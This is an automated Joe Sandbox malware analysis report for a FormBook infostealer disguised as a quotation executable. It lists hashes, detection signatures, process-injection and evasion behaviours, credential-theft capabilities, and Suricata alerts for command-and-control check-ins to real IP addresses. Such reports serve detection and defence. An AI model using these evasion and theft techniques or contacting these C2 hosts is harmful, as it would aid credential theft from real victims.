Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION#050125.exe

Overview

General Information

Sample name:QUOTATION#050125.exe
Analysis ID:1586807
MD5:b1261de24d9bcbf7395ae21722d32a37
SHA1:dd0d541b122ef10b820925b47ab94d76905df95c
SHA256:ba10f77f57b8d779c13abf725979c204d8f3b618ebd0d2f88e6c0cc7eb11c989
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • QUOTATION#050125.exe (PID: 8936 cmdline: "C:\Users\user\Desktop\QUOTATION#050125.exe" MD5: B1261DE24D9BCBF7395AE21722D32A37)
    • svchost.exe (PID: 9000 cmdline: "C:\Users\user\Desktop\QUOTATION#050125.exe" MD5: B7C999040D80E5BF87886D70D992C51E)
      • SwDwSdNMaTt.exe (PID: 7780 cmdline: "C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cmdkey.exe (PID: 3252 cmdline: "C:\Windows\SysWOW64\cmdkey.exe" MD5: 6CDC8E5DF04752235D5B4432EACC81A8)
          • SwDwSdNMaTt.exe (PID: 5384 cmdline: "C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3380 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: 7B12552FD2A5948256B20EC97B708F94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.293705525670.0000000000C80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.289276636608.0000000005200000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.289276489302.0000000003BA0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.292817073543.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\QUOTATION#050125.exe", CommandLine: "C:\Users\user\Desktop\QUOTATION#050125.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#050125.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#050125.exe, ParentProcessId: 8936, ParentProcessName: QUOTATION#050125.exe, ProcessCommandLine: "C:\Users\user\Desktop\QUOTATION#050125.exe", ProcessId: 9000, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\QUOTATION#050125.exe", CommandLine: "C:\Users\user\Desktop\QUOTATION#050125.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#050125.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#050125.exe, ParentProcessId: 8936, ParentProcessName: QUOTATION#050125.exe, ProcessCommandLine: "C:\Users\user\Desktop\QUOTATION#050125.exe", ProcessId: 9000, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-09T16:52:36.489820+010020283713Unknown Traffic192.168.11.304981623.51.25.15443TCP
                2025-01-09T16:54:42.963333+010020283713Unknown Traffic192.168.11.304983423.51.25.15443TCP
                2025-01-09T16:56:49.482152+010020283713Unknown Traffic192.168.11.304986623.51.25.15443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-09T16:53:52.051834+010028554651A Network Trojan was detected192.168.11.3049822194.9.94.8580TCP
                2025-01-09T16:54:15.757014+010028554651A Network Trojan was detected192.168.11.304982645.33.2.7980TCP
                2025-01-09T16:54:29.548389+010028554651A Network Trojan was detected192.168.11.3049830104.21.32.180TCP
                2025-01-09T16:54:43.248467+010028554651A Network Trojan was detected192.168.11.3049835199.192.21.16980TCP
                2025-01-09T16:55:06.653934+010028554651A Network Trojan was detected192.168.11.304984047.83.1.9080TCP
                2025-01-09T16:55:22.176095+010028554651A Network Trojan was detected192.168.11.304984413.248.169.4880TCP
                2025-01-09T16:55:37.221311+010028554651A Network Trojan was detected192.168.11.3049848160.25.166.12380TCP
                2025-01-09T16:55:50.646653+010028554651A Network Trojan was detected192.168.11.3049852172.67.132.22780TCP
                2025-01-09T16:56:13.200101+010028554651A Network Trojan was detected192.168.11.3049856136.243.64.14780TCP
                2025-01-09T16:56:28.134094+010028554651A Network Trojan was detected192.168.11.3049860202.95.11.11080TCP
                2025-01-09T16:56:42.719717+010028554651A Network Trojan was detected192.168.11.304986413.248.169.4880TCP
                2025-01-09T16:56:56.585336+010028554651A Network Trojan was detected192.168.11.3049869103.106.67.11280TCP
                2025-01-09T16:57:10.239085+010028554651A Network Trojan was detected192.168.11.3049873104.21.32.180TCP
                2025-01-09T16:57:25.324867+010028554651A Network Trojan was detected192.168.11.304987747.83.1.9080TCP
                2025-01-09T16:57:33.954130+010028554651A Network Trojan was detected192.168.11.3049878194.9.94.8580TCP
                2025-01-09T16:57:47.321678+010028554651A Network Trojan was detected192.168.11.304988245.33.2.7980TCP
                2025-01-09T16:58:00.985202+010028554651A Network Trojan was detected192.168.11.3049886104.21.32.180TCP
                2025-01-09T16:58:14.525215+010028554651A Network Trojan was detected192.168.11.3049890199.192.21.16980TCP
                2025-01-09T16:58:37.649832+010028554651A Network Trojan was detected192.168.11.304989447.83.1.9080TCP
                2025-01-09T16:58:50.987001+010028554651A Network Trojan was detected192.168.11.304989813.248.169.4880TCP
                2025-01-09T16:59:05.402450+010028554651A Network Trojan was detected192.168.11.3049902160.25.166.12380TCP
                2025-01-09T16:59:18.658329+010028554651A Network Trojan was detected192.168.11.3049906172.67.132.22780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-09T16:54:07.714217+010028554641A Network Trojan was detected192.168.11.304982345.33.2.7980TCP
                2025-01-09T16:54:10.391004+010028554641A Network Trojan was detected192.168.11.304982445.33.2.7980TCP
                2025-01-09T16:54:13.077070+010028554641A Network Trojan was detected192.168.11.304982545.33.2.7980TCP
                2025-01-09T16:54:21.608591+010028554641A Network Trojan was detected192.168.11.3049827104.21.32.180TCP
                2025-01-09T16:54:24.244183+010028554641A Network Trojan was detected192.168.11.3049828104.21.32.180TCP
                2025-01-09T16:54:26.937990+010028554641A Network Trojan was detected192.168.11.3049829104.21.32.180TCP
                2025-01-09T16:54:35.120967+010028554641A Network Trojan was detected192.168.11.3049831199.192.21.16980TCP
                2025-01-09T16:54:37.839285+010028554641A Network Trojan was detected192.168.11.3049832199.192.21.16980TCP
                2025-01-09T16:54:40.554331+010028554641A Network Trojan was detected192.168.11.3049833199.192.21.16980TCP
                2025-01-09T16:54:58.140683+010028554641A Network Trojan was detected192.168.11.304983747.83.1.9080TCP
                2025-01-09T16:55:00.987330+010028554641A Network Trojan was detected192.168.11.304983847.83.1.9080TCP
                2025-01-09T16:55:03.815419+010028554641A Network Trojan was detected192.168.11.304983947.83.1.9080TCP
                2025-01-09T16:55:13.143460+010028554641A Network Trojan was detected192.168.11.304984113.248.169.4880TCP
                2025-01-09T16:55:16.828657+010028554641A Network Trojan was detected192.168.11.304984213.248.169.4880TCP
                2025-01-09T16:55:19.503582+010028554641A Network Trojan was detected192.168.11.304984313.248.169.4880TCP
                2025-01-09T16:55:28.531368+010028554641A Network Trojan was detected192.168.11.3049845160.25.166.12380TCP
                2025-01-09T16:55:31.447955+010028554641A Network Trojan was detected192.168.11.3049846160.25.166.12380TCP
                2025-01-09T16:55:34.328891+010028554641A Network Trojan was detected192.168.11.3049847160.25.166.12380TCP
                2025-01-09T16:55:42.696549+010028554641A Network Trojan was detected192.168.11.3049849172.67.132.22780TCP
                2025-01-09T16:55:45.403920+010028554641A Network Trojan was detected192.168.11.3049850172.67.132.22780TCP
                2025-01-09T16:55:47.995536+010028554641A Network Trojan was detected192.168.11.3049851172.67.132.22780TCP
                2025-01-09T16:56:04.899063+010028554641A Network Trojan was detected192.168.11.3049853136.243.64.14780TCP
                2025-01-09T16:56:07.661034+010028554641A Network Trojan was detected192.168.11.3049854136.243.64.14780TCP
                2025-01-09T16:56:10.433956+010028554641A Network Trojan was detected192.168.11.3049855136.243.64.14780TCP
                2025-01-09T16:56:19.465774+010028554641A Network Trojan was detected192.168.11.3049857202.95.11.11080TCP
                2025-01-09T16:56:22.308847+010028554641A Network Trojan was detected192.168.11.3049858202.95.11.11080TCP
                2025-01-09T16:56:25.148181+010028554641A Network Trojan was detected192.168.11.3049859202.95.11.11080TCP
                2025-01-09T16:56:33.688551+010028554641A Network Trojan was detected192.168.11.304986113.248.169.4880TCP
                2025-01-09T16:56:36.359727+010028554641A Network Trojan was detected192.168.11.304986213.248.169.4880TCP
                2025-01-09T16:56:40.047154+010028554641A Network Trojan was detected192.168.11.304986313.248.169.4880TCP
                2025-01-09T16:56:48.438417+010028554641A Network Trojan was detected192.168.11.3049865103.106.67.11280TCP
                2025-01-09T16:56:51.152255+010028554641A Network Trojan was detected192.168.11.3049867103.106.67.11280TCP
                2025-01-09T16:56:53.881158+010028554641A Network Trojan was detected192.168.11.3049868103.106.67.11280TCP
                2025-01-09T16:57:02.223002+010028554641A Network Trojan was detected192.168.11.3049870104.21.32.180TCP
                2025-01-09T16:57:04.782211+010028554641A Network Trojan was detected192.168.11.3049871104.21.32.180TCP
                2025-01-09T16:57:07.466673+010028554641A Network Trojan was detected192.168.11.3049872104.21.32.180TCP
                2025-01-09T16:57:16.761522+010028554641A Network Trojan was detected192.168.11.304987447.83.1.9080TCP
                2025-01-09T16:57:19.624236+010028554641A Network Trojan was detected192.168.11.304987547.83.1.9080TCP
                2025-01-09T16:57:22.481832+010028554641A Network Trojan was detected192.168.11.304987647.83.1.9080TCP
                2025-01-09T16:57:39.268222+010028554641A Network Trojan was detected192.168.11.304987945.33.2.7980TCP
                2025-01-09T16:57:41.954078+010028554641A Network Trojan was detected192.168.11.304988045.33.2.7980TCP
                2025-01-09T16:57:44.641972+010028554641A Network Trojan was detected192.168.11.304988145.33.2.7980TCP
                2025-01-09T16:57:53.012748+010028554641A Network Trojan was detected192.168.11.3049883104.21.32.180TCP
                2025-01-09T16:57:55.676284+010028554641A Network Trojan was detected192.168.11.3049884104.21.32.180TCP
                2025-01-09T16:57:58.348105+010028554641A Network Trojan was detected192.168.11.3049885104.21.32.180TCP
                2025-01-09T16:58:06.393139+010028554641A Network Trojan was detected192.168.11.3049887199.192.21.16980TCP
                2025-01-09T16:58:09.106949+010028554641A Network Trojan was detected192.168.11.3049888199.192.21.16980TCP
                2025-01-09T16:58:11.813837+010028554641A Network Trojan was detected192.168.11.3049889199.192.21.16980TCP
                2025-01-09T16:58:29.109139+010028554641A Network Trojan was detected192.168.11.304989147.83.1.9080TCP
                2025-01-09T16:58:31.945382+010028554641A Network Trojan was detected192.168.11.304989247.83.1.9080TCP
                2025-01-09T16:58:34.815159+010028554641A Network Trojan was detected192.168.11.304989347.83.1.9080TCP
                2025-01-09T16:58:42.958756+010028554641A Network Trojan was detected192.168.11.304989513.248.169.4880TCP
                2025-01-09T16:58:45.628143+010028554641A Network Trojan was detected192.168.11.304989613.248.169.4880TCP
                2025-01-09T16:58:48.303957+010028554641A Network Trojan was detected192.168.11.304989713.248.169.4880TCP
                2025-01-09T16:58:56.719814+010028554641A Network Trojan was detected192.168.11.3049899160.25.166.12380TCP
                2025-01-09T16:58:59.607669+010028554641A Network Trojan was detected192.168.11.3049900160.25.166.12380TCP
                2025-01-09T16:59:02.498649+010028554641A Network Trojan was detected192.168.11.3049901160.25.166.12380TCP
                2025-01-09T16:59:10.674523+010028554641A Network Trojan was detected192.168.11.3049903172.67.132.22780TCP
                2025-01-09T16:59:13.329885+010028554641A Network Trojan was detected192.168.11.3049904172.67.132.22780TCP
                2025-01-09T16:59:15.987992+010028554641A Network Trojan was detected192.168.11.3049905172.67.132.22780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: QUOTATION#050125.exeAvira: detected
                Multi AV Scanner detection for submitted file
                Source: QUOTATION#050125.exeReversingLabs: Detection: 63%
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.293705525670.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.289274740765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.289276636608.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.289276489302.0000000003BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.292817073543.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.292817177626.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.293706459836.0000000004460000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Machine Learning detection for sample
                Source: QUOTATION#050125.exeJoe Sandbox ML: detected
                Source: QUOTATION#050125.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: cmdkey.pdbGCTL source: svchost.exe, 00000003.00000003.289243898151.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275035878.0000000003200000.00000004.00000020.00020000.00000000.sdmp, SwDwSdNMaTt.exe, 00000005.00000003.292462791821.00000000010DB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: QUOTATION#050125.exe, 00000002.00000003.288634047789.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#050125.exe, 00000002.00000003.288633604844.0000000003990000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275465830.000000000392D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.289183129164.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.289180231245.0000000003400000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000003.289275169587.0000000002DE3000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000003.289279216842.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: QUOTATION#050125.exe, 00000002.00000003.288634047789.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#050125.exe, 00000002.00000003.288633604844.0000000003990000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.289275465830.000000000392D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.289183129164.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275465830.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.289180231245.0000000003400000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000006.00000003.289275169587.0000000002DE3000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292817455715.000000000326D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000003.289279216842.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292817455715.0000000003140000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: cmdkey.pdb source: svchost.exe, 00000003.00000003.289243898151.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.289275035878.0000000003200000.00000004.00000020.00020000.00000000.sdmp, SwDwSdNMaTt.exe, 00000005.00000003.292462791821.00000000010DB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: cmdkey.exe, 00000006.00000002.292815481224.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.000000000376C000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000000.289344432369.0000000002CCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000011F5C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: cmdkey.exe, 00000006.00000002.292815481224.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000006.00000002.292818357888.000000000376C000.00000004.10000000.00040000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000000.289344432369.0000000002CCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.289570074224.0000000011F5C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000FC2A2 FindFirstFileExW,2_2_000FC2A2
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_001368EE FindFirstFileW,FindClose,2_2_001368EE
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0013698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_0013698F
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0012D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0012D076
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0012D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0012D3A9
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00139642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00139642
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0013979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0013979D
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00139B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00139B2B
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0012DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_0012DBBE
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00135C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00135C97
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 4x nop then mov ebx, 00000004h6_2_030304E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49832 -> 199.192.21.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49838 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49843 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49839 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49824 -> 45.33.2.79:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49835 -> 199.192.21.169:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49830 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49822 -> 194.9.94.85:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49850 -> 172.67.132.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49847 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49825 -> 45.33.2.79:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49844 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49823 -> 45.33.2.79:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49845 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49863 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49856 -> 136.243.64.147:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49840 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49837 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49854 -> 136.243.64.147:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49868 -> 103.106.67.112:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49846 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49853 -> 136.243.64.147:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49864 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49849 -> 172.67.132.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49888 -> 199.192.21.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49851 -> 172.67.132.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49826 -> 45.33.2.79:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49842 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49831 -> 199.192.21.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49892 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49875 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49876 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49855 -> 136.243.64.147:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49898 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49858 -> 202.95.11.110:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49860 -> 202.95.11.110:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49872 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.30:49883 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.30:49886 -> 104.21.32.1:80
